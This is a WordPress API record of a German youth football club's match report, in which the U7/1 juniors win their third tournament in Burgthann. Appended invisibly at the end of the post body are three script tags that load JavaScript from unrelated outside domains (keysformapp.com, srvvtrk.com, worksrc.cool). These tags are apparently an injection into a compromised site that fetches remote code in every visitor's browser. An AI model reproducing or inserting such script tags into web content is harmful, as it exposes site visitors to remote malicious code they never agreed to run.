{"id":7072,"date":"2019-01-14T22:14:18","date_gmt":"2019-01-14T21:14:18","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=7072"},"modified":"2019-01-14T22:14:18","modified_gmt":"2019-01-14T21:14:18","slug":"alle-guten-dinge-sind-3-bei-den-u7-1-junioren","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/","title":{"rendered":"Alle guten Dinge sind 3&#8230;  bei den U7\/1-Junioren"},"content":{"rendered":"<p>Alle guten Dinge sind 3 <span class=\"_47e3 _5mfr\" title=\"\u201esmile\u201c-Emoticon\"><img loading=\"lazy\" decoding=\"async\" class=\"img\" role=\"presentation\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png\" alt=\"\" width=\"16\" height=\"16\" \/><\/span><\/p>\n<p>Am Sonntag, den 13.1. ging es f\u00fcr unsere U7\/1 Junioren in die dritte Runde der HKM nach Burgthann, zu einem wie immer sehr herzlichen und gut vorbereiteten Gastgeber. Nachdem wir die beiden vorherigen Turniere bereits f\u00fcr uns entscheiden konnten, wollten wir zum Abschluss nat\u00fcrlich das \u201eTripple\u201c perfekt machen. Gegen f\u00fcnf weitere Mannschaften galt es sich im Modus, \u201eJeder gegen Jeden\u201c durchzusetzen. Mit vier Siegen, einem Unentschieden und nur einem<span class=\"text_exposed_show\"> Gegentor beendeten die Blues einen fast perfekten Turniertag, den nur der un\u00fcberwindbare, gegnerische Torwart aus Pyrbaum mit seinen Paraden zu verhindern wusste.<br \/>\n3.Turnier! 3. Sieg und wider einmal eine absolut \u00fcberzeugende, mannschaftliche Leistung. Ehrgeiz, Spielfreude, Spa\u00df und nat\u00fcrlich Teamgeist, eine Kombination die uns jede Woche aufs Neue viel Freude bereitet. Wir blicken gespannt auf die Fr\u00fchjahrsrunde, in der sich unsere Kids erstmals in der F-Jugend, sowie weiterhin in der U7-Jugend behaupten m\u00fcssen.<\/span><\/p>\n<div class=\"text_exposed_show\">\n<p>Alex, Florian und Finn<\/p>\n<\/div>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/srvvtrk.com\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1547500391792\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worksrc.cool\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alle guten Dinge sind 3 Am Sonntag, den 13.1. ging es f\u00fcr unsere U7\/1 Junioren in die dritte Runde der HKM nach Burgthann, zu einem wie immer sehr herzlichen und gut vorbereiteten Gastgeber. Nachdem wir die beiden vorherigen Turniere bereits f\u00fcr uns entscheiden konnten, wollten wir zum Abschluss nat\u00fcrlich das \u201eTripple\u201c perfekt machen. Gegen f\u00fcnf [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[3,16,25],"tags":[],"class_list":["post-7072","post","type-post","status-publish","format-standard","hentry","category-kf","category-spielbericht","category-u7-roeth"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Alle guten Dinge sind 3... bei den U7\/1-Junioren - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Alle guten Dinge sind 3... bei den U7\/1-Junioren - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"Alle guten Dinge sind 3 Am Sonntag, den 13.1. ging es f\u00fcr unsere U7\/1 Junioren in die dritte Runde der HKM nach Burgthann, zu einem wie immer sehr herzlichen und gut vorbereiteten Gastgeber. Nachdem wir die beiden vorherigen Turniere bereits f\u00fcr uns entscheiden konnten, wollten wir zum Abschluss nat\u00fcrlich das \u201eTripple\u201c perfekt machen. Gegen f\u00fcnf [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2019-01-14T21:14:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"Alle guten Dinge sind 3&#8230; bei den U7\\\/1-Junioren\",\"datePublished\":\"2019-01-14T21:14:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/\"},\"wordCount\":164,\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/t4c\\\/1\\\/16\\\/1f642.png\",\"articleSection\":[\"Kleinfeld\",\"Spielbericht\",\"U7 R\u00f6th.\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/\",\"name\":\"Alle guten Dinge sind 3... bei den U7\\\/1-Junioren - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/t4c\\\/1\\\/16\\\/1f642.png\",\"datePublished\":\"2019-01-14T21:14:18+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#primaryimage\",\"url\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/t4c\\\/1\\\/16\\\/1f642.png\",\"contentUrl\":\"https:\\\/\\\/static.xx.fbcdn.net\\\/images\\\/emoji.php\\\/v9\\\/t4c\\\/1\\\/16\\\/1f642.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Alle guten Dinge sind 3&#8230; bei den U7\\\/1-Junioren\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Alle guten Dinge sind 3... bei den U7\/1-Junioren - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/","og_locale":"de_DE","og_type":"article","og_title":"Alle guten Dinge sind 3... bei den U7\/1-Junioren - JFG Wendelstein","og_description":"Alle guten Dinge sind 3 Am Sonntag, den 13.1. ging es f\u00fcr unsere U7\/1 Junioren in die dritte Runde der HKM nach Burgthann, zu einem wie immer sehr herzlichen und gut vorbereiteten Gastgeber. Nachdem wir die beiden vorherigen Turniere bereits f\u00fcr uns entscheiden konnten, wollten wir zum Abschluss nat\u00fcrlich das \u201eTripple\u201c perfekt machen. Gegen f\u00fcnf [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/","og_site_name":"JFG Wendelstein","article_published_time":"2019-01-14T21:14:18+00:00","og_image":[{"url":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png","type":"","width":"","height":""}],"author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"Alle guten Dinge sind 3&#8230; bei den U7\/1-Junioren","datePublished":"2019-01-14T21:14:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/"},"wordCount":164,"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#primaryimage"},"thumbnailUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png","articleSection":["Kleinfeld","Spielbericht","U7 R\u00f6th."],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/","name":"Alle guten Dinge sind 3... bei den U7\/1-Junioren - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#primaryimage"},"image":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#primaryimage"},"thumbnailUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png","datePublished":"2019-01-14T21:14:18+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#primaryimage","url":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png","contentUrl":"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4c\/1\/16\/1f642.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/alle-guten-dinge-sind-3-bei-den-u7-1-junioren\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"Alle guten Dinge sind 3&#8230; bei den U7\/1-Junioren"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/7072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=7072"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/7072\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=7072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=7072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=7072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}